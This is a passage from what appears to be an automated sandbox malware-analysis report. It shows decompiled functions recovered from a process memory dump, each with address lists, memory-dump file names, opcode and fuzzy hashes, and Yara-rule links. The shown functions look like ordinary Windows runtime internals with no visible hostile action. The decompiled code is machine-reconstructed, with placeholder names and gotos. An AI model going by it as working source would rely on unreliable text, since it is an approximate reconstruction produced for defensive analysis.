							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E036D8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                      0x036d8a0a
                                      0x036d8a1c
                                      0x036d8a23
                                      0x036d8a2e
                                      0x036d8a30
                                      0x036d8a36
                                      0x036d8a3c
                                      0x036d8a3e
                                      0x036d8a4a
                                      0x036d8a52
                                      0x036d8a9c
                                      0x036d8aae
                                      0x036d8a58
                                      0x036d8a5e
                                      0x036d8a6a
                                      0x036d8a6f
                                      0x036d8a75
                                      0x036d8a7d
                                      0x036d8a85
                                      0x036d8a86
                                      0x036d8a89
                                      0x036d8a93
                                      0x036d8a99
                                      0x036d8a9b
                                      0x00000000
                                      0x036d8aaf
                                      0x036d8abe
                                      0x036d8ac3
                                      0x036d8acb
                                      0x036d8ad7
                                      0x036d8ae0
                                      0x036d8af1
                                      0x00000000
                                      0x036d8af1
                                      0x036d8acd
                                      0x036d8ad5
                                      0x036d8afb
                                      0x036d8afd
                                      0x036d8aff
                                      0x036d8b07
                                      0x036d8b22
                                      0x036d8b24
                                      0x036d8b2a
                                      0x036d8b2e
                                      0x036d8b3f
                                      0x036d8b78
                                      0x036d8b41
                                      0x036d8b52
                                      0x036d8b54
                                      0x036d8b5c
                                      0x036d8b74
                                      0x036d8b74
                                      0x036d8b5c
                                      0x036d8b3f
                                      0x036d8b5e
                                      0x036d8b61
                                      0x036d8b64
                                      0x036d8b64
                                      0x036d8b6c
                                      0x036d8b6c
                                      0x036d8b11
                                      0x03729cd5
                                      0x03729cd5
                                      0x036d8b17
                                      0x036d8b1a
                                      0x036d8b1a
                                      0x00000000
                                      0x036d8ad5
                                      0x036d8a89

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 134828c62442ffb223e197610abeb43a0e60ae8c8772b3a72cd193bcd2fbf348
                                      • Instruction ID: 45be2f6765a2848743817fd4dca3a6b6dc106e90e34f96dce5513118f0e3db46
                                      • Opcode Fuzzy Hash: 134828c62442ffb223e197610abeb43a0e60ae8c8772b3a72cd193bcd2fbf348
                                      • Instruction Fuzzy Hash: 59415EB4E003289BDB24DF59C98CAAAB7F8EB44300F1445E9D9199B341E7709E81CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037469A6, Relevance: .1, Instructions: 108COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 69%
                                      			E037469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x37bd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L036D6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03746BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03709980() >= 0) {
							E036E2280(_t56, 0x37b8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x37b8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x37b8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E036CB6F0(0x36ac338, 0x36ac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03709520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E037095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E036DFFB0(_t68, _t77, 0x37b8778);
				}
				_pop(_t78);
				return E0370B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                      0x037469b5
                                      0x037469be
                                      0x037469c3
                                      0x037469c9
                                      0x037469cc
                                      0x037469d1
                                      0x037469d3
                                      0x037469de
                                      0x037469e1
                                      0x037469ea
                                      0x037469f6
                                      0x037469fe
                                      0x03746a13
                                      0x03746a14
                                      0x03746a15
                                      0x03746a16
                                      0x03746a1e
                                      0x03746a26
                                      0x03746a31
                                      0x03746a36
                                      0x03746a37
                                      0x03746a40
                                      0x03746a49
                                      0x03746a4a
                                      0x03746a53
                                      0x03746a59
                                      0x03746a5d
                                      0x03746a5e
                                      0x03746a64
                                      0x03746a67
                                      0x03746a6a
                                      0x03746a6d
                                      0x03746a70
                                      0x03746a77
                                      0x03746a7d
                                      0x03746a86
                                      0x03746a89
                                      0x03746a9c
                                      0x03746a9f
                                      0x03746aa2
                                      0x03746aa5
                                      0x03746aaf
                                      0x03746ab1
                                      0x03746ab8
                                      0x03746ab9
                                      0x03746abb
                                      0x03746abe
                                      0x03746ac5
                                      0x03746ac5
                                      0x03746aaf
                                      0x03746a40
                                      0x03746a26
                                      0x037469fe
                                      0x03746ace
                                      0x03746ad0
                                      0x03746ad3
                                      0x03746ad8
                                      0x03746adf
                                      0x03746adf
                                      0x03746ae8
                                      0x03746aef
                                      0x03746aef
                                      0x03746af9
                                      0x03746b06

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b7ed86b391852615cacb58455836de6e6a75f72225ea2fbdbc98d9492ba93091
                                      • Instruction ID: 92b5b57a7a49930fb8fe5d712c7deac8aa02e51c05ef13a45fc54d0bdf177ae9
                                      • Opcode Fuzzy Hash: b7ed86b391852615cacb58455836de6e6a75f72225ea2fbdbc98d9492ba93091
                                      • Instruction Fuzzy Hash: 0C416AB5E00708AFDB14DFA5C880BEEBBF8EF49714F18812AE914A7251DB74A905CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036C5210, Relevance: .1, Instructions: 107COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E036C5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E036C52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E037095D0();
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E036DEB70(_t54, 0x37b79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E037095D0();
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E036DEB70(_t54, 0x37b79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0370F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E036DEB70(_t54, 0x37b79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E037095D0();
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                      0x036c5220
                                      0x036c5224
                                      0x03720d13
                                      0x03720d16
                                      0x03720d19
                                      0x036c522a
                                      0x036c522a
                                      0x036c522d
                                      0x036c522d
                                      0x036c5231
                                      0x036c5235
                                      0x036c5239
                                      0x03720d5c
                                      0x03720d62
                                      0x00000000
                                      0x00000000
                                      0x03720d6a
                                      0x03720d7b
                                      0x03720d7f
                                      0x03720d81
                                      0x03720d84
                                      0x03720d95
                                      0x03720d95
                                      0x03720d6c
                                      0x03720d71
                                      0x03720d71
                                      0x03720d9a
                                      0x00000000
                                      0x036c524a
                                      0x036c524a
                                      0x036c5250
                                      0x03720d24
                                      0x03720d35
                                      0x03720d39
                                      0x03720d3b
                                      0x03720d3e
                                      0x03720d50
                                      0x03720d50
                                      0x03720d26
                                      0x03720d2b
                                      0x03720d2b
                                      0x00000000
                                      0x03720d55
                                      0x036c5256
                                      0x036c525b
                                      0x036c5265
                                      0x03720da7
                                      0x036c526b
                                      0x036c526e
                                      0x036c5272
                                      0x03720db1
                                      0x03720db4
                                      0x03720dc5
                                      0x03720dc5
                                      0x036c5272
                                      0x036c5278
                                      0x036c527e
                                      0x036c528a
                                      0x036c528c
                                      0x036c528d
                                      0x00000000
                                      0x036c5280
                                      0x036c5282
                                      0x036c5288
                                      0x036c529f
                                      0x036c5292
                                      0x00000000
                                      0x036c5292
                                      0x00000000
                                      0x036c5288
                                      0x036c527e

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1abc28a5e961bf884d1e5306d859f3c5ed6034b3617294d29751cb21416544b9
                                      • Instruction ID: 4aae91bf18aa9ec5e16d7eb353de1ee7ad7a1fb6cbdb3bfaabb207615957c952
                                      • Opcode Fuzzy Hash: 1abc28a5e961bf884d1e5306d859f3c5ed6034b3617294d29751cb21416544b9
                                      • Instruction Fuzzy Hash: 04310131652760EBC725EB29CD80B7ABBB5FF01760F14461EE9561F2E1DB60F800C6A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036FA61C, Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E036FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x37a0220);
				E0371D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x37b7b9c; // 0x0
				_t55 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0371D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x37b7b10 =  *0x37b7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x37b536c; // 0x2e80530
					if( *_t51 != 0x37b5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x37b5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x37b536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E036FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                      0x036fa61c
                                      0x036fa61e
                                      0x036fa623
                                      0x036fa628
                                      0x036fa62b
                                      0x036fa62d
                                      0x036fa648
                                      0x036fa64a
                                      0x036fa64f
                                      0x03739b44
                                      0x036fa6ec
                                      0x036fa6f1
                                      0x036fa6f1
                                      0x036fa655
                                      0x036fa657
                                      0x036fa65a
                                      0x036fa65d
                                      0x036fa662
                                      0x036fa663
                                      0x036fa667
                                      0x036fa668
                                      0x036fa66d
                                      0x036fa706
                                      0x036fa706
                                      0x03739bda
                                      0x03739be6
                                      0x03739beb
                                      0x00000000
                                      0x03739beb
                                      0x036fa679
                                      0x03739b7a
                                      0x00000000
                                      0x03739b7a
                                      0x036fa683
                                      0x036fa6f4
                                      0x036fa6f7
                                      0x036fa6f9
                                      0x036fa6fd
                                      0x036fa6a0
                                      0x036fa6a0
                                      0x036fa6ad
                                      0x036fa6af
                                      0x036fa6b4
                                      0x03739ba7
                                      0x03739bac
                                      0x00000000
                                      0x00000000
                                      0x03739bc6
                                      0x03739bce
                                      0x03739bd1
                                      0x03739bd3
                                      0x03739bd3
                                      0x00000000
                                      0x03739bd1
                                      0x036fa6bd
                                      0x036fa6c3
                                      0x036fa6c6
                                      0x036fa6d2
                                      0x036fa701
                                      0x036fa704
                                      0x00000000
                                      0x036fa704
                                      0x036fa6d4
                                      0x036fa6d6
                                      0x036fa6d9
                                      0x036fa6db
                                      0x036fa6e1
                                      0x036fa6e6
                                      0x036fa6e8
                                      0x036fa6e8
                                      0x036fa6ea
                                      0x00000000
                                      0x036fa6ea
                                      0x036fa688
                                      0x036fa692
                                      0x036fa694
                                      0x036fa699
                                      0x00000000
                                      0x00000000
                                      0x036fa69d
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c1c2988e11043ccb54b03521ed19adcac0e52743e9381c33015d6b342f5d80a
                                      • Instruction ID: c7f791d7386197bc4d648ea5fc5ab5d70d54f71fcbfbf346b26fe671c10b22de
                                      • Opcode Fuzzy Hash: 3c1c2988e11043ccb54b03521ed19adcac0e52743e9381c33015d6b342f5d80a
                                      • Instruction Fuzzy Hash: 51415B79A00205DFCB19CF98C890B99BBF1BF4A314F19C1A9E908AF345D775A901CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03703D43, Relevance: .1, Instructions: 106COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E03703D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E036D7B60(0, _t61, 0x36a11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E036D7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L036E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                      0x03703d4c
                                      0x03703d50
                                      0x03703d55
                                      0x03703d5e
                                      0x0373e79a
                                      0x00000000
                                      0x0373e79a
                                      0x03703d68
                                      0x0373e789
                                      0x03703d9d
                                      0x03703da3
                                      0x03703daf
                                      0x03703db5
                                      0x03703dbc
                                      0x03703dc4
                                      0x03703dc9
                                      0x03703dce
                                      0x0373e7ae
                                      0x0373e7ae
                                      0x03703dde
                                      0x03703de2
                                      0x03703de7
                                      0x03703e0d
                                      0x03703e13
                                      0x03703e16
                                      0x03703e1e
                                      0x03703e25
                                      0x03703e28
                                      0x00000000
                                      0x00000000
                                      0x03703e2a
                                      0x03703e2f
                                      0x03703e37
                                      0x03703e37
                                      0x00000000
                                      0x03703e37
                                      0x03703e31
                                      0x00000000
                                      0x03703e31
                                      0x03703e20
                                      0x03703e20
                                      0x03703e35
                                      0x00000000
                                      0x03703de9
                                      0x03703de9
                                      0x03703de9
                                      0x03703dee
                                      0x03703dfd
                                      0x03703dff
                                      0x03703e02
                                      0x03703e05
                                      0x03703e05
                                      0x00000000
                                      0x03703df0
                                      0x03703de7
                                      0x0373e78f
                                      0x0373e794
                                      0x03703d79
                                      0x03703d84
                                      0x03703d89
                                      0x03703d8e
                                      0x00000000
                                      0x0373e7a4
                                      0x03703d96
                                      0x03703d9a
                                      0x00000000
                                      0x03703d9a
                                      0x00000000
                                      0x0373e794
                                      0x03703d6e
                                      0x03703d73
                                      0x00000000
                                      0x0373e7b5
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f68317508d057e241409361705284f50a41839171fcf00f64ab94b9ce9c0d3a
                                      • Instruction ID: 6d569cee0383ac5bb9eed1d049ce9867d8377cc57815ab314983bda4a71f16ae
                                      • Opcode Fuzzy Hash: 9f68317508d057e241409361705284f50a41839171fcf00f64ab94b9ce9c0d3a
                                      • Instruction Fuzzy Hash: 4431C03AA01615DFE728CF29C841A7BBBF5EF46700B09816EE859DB390E730D840D790
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036EC182, Relevance: .1, Instructions: 104COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E036EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E036E7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03798D34(_v8, _t80);
					}
					E036E2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E036DFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03798833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E036DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0370B180();
						if(_a4 != 0) {
							E036E2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E036EBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E036EBB2D(_t16, _t15);
						E036EB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E036DFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E036DFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E036DFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                      0x036ec18d
                                      0x036ec18f
                                      0x036ec191
                                      0x036ec19b
                                      0x036ec1a0
                                      0x036ec1d4
                                      0x036ec1de
                                      0x03732d6e
                                      0x036ec1e4
                                      0x036ec1e4
                                      0x036ec1e4
                                      0x036ec1ec
                                      0x03732d7d
                                      0x03732d7d
                                      0x036ec1f3
                                      0x036ec1ff
                                      0x03732d88
                                      0x03732d8d
                                      0x03732d94
                                      0x03732d94
                                      0x03732d9f
                                      0x03732da4
                                      0x03732dab
                                      0x03732db0
                                      0x03732db2
                                      0x03732db3
                                      0x03732db4
                                      0x03732dbc
                                      0x03732dc3
                                      0x03732dc3
                                      0x036ec205
                                      0x036ec205
                                      0x036ec208
                                      0x036ec20e
                                      0x036ec211
                                      0x036ec216
                                      0x036ec219
                                      0x036ec21f
                                      0x036ec222
                                      0x036ec22c
                                      0x036ec234
                                      0x036ec23a
                                      0x036ec23f
                                      0x036ec245
                                      0x036ec24b
                                      0x036ec251
                                      0x036ec25a
                                      0x036ec276
                                      0x036ec27d
                                      0x036ec27d
                                      0x036ec25c
                                      0x036ec25c
                                      0x00000000
                                      0x036ec25e
                                      0x036ec1a4
                                      0x036ec1aa
                                      0x036ec1b3
                                      0x036ec265
                                      0x036ec26c
                                      0x036ec26c
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                      • Instruction ID: 976bea3e4cc03d1fecaaaea839ee1d60f5a475bc57550b6ad22477f985138d08
                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                      • Instruction Fuzzy Hash: 44313A76A0264ABED704EBB4C480BE9FB68FF46204F08415ED41C5F341DB346A4ED7A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03747016, Relevance: .1, Instructions: 104COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 76%
                                      			E03747016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x37bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
